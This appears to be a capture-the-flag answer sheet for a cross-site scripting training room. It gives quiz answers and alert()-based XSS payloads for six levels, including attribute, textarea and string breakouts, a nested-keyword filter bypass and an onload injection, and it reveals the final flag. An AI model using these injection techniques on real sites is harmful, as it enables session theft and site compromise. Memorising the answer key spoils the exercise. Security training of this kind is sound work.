• What does XSS stand for?

Answer : Cross-site Scripting

• Which document property could contain the user's session token?

Answer : document.cookie

• Which JavaScript method is often used as a Proof Of Concept?

Answer : alert

• Where in an URL is a good place to test for reflected XSS?

Answer : Parameters

• How are stored XSS payloads usually stored on a website?

Answer : database

•  What unsafe JavaScript method is good to look for in source code?

Answer : eval()

• What tool can you use to test for Blind XSS?

Answer : xsshunter

• What type of XSS is very similar to Blind XSS?

Answer : Stored XSS

• What is the flag you received from level six?

LEVEL 1 : You just need to alert() the keyword THM :

<script>alert('THM');</script>

LEVEL 2 : You need to escape <h2>Hello, <input value="johny"></h2>

"><script>alert('THM');</script>

LEVEL 3 : You need to escape <h2>Hello, <textarea>meee</textarea></h2>

</textarea><script>alert('THM');</script>

LEVEL 4 : You need to escape a call from a script document.getElementsByClassName('name')[0].innerHTML='hey you';

';alert('THM');//

LEVEL 5 : A filter is applied and remove keywords like "script"

<sscriptcript>alert('THM');</sscriptcript>

LEVEL 6 : You need to put script on image <img src="/images/cat.jpg">

/images/cat.jpg" onload="alert('THM');

Answer : THM{XSS_MASTER}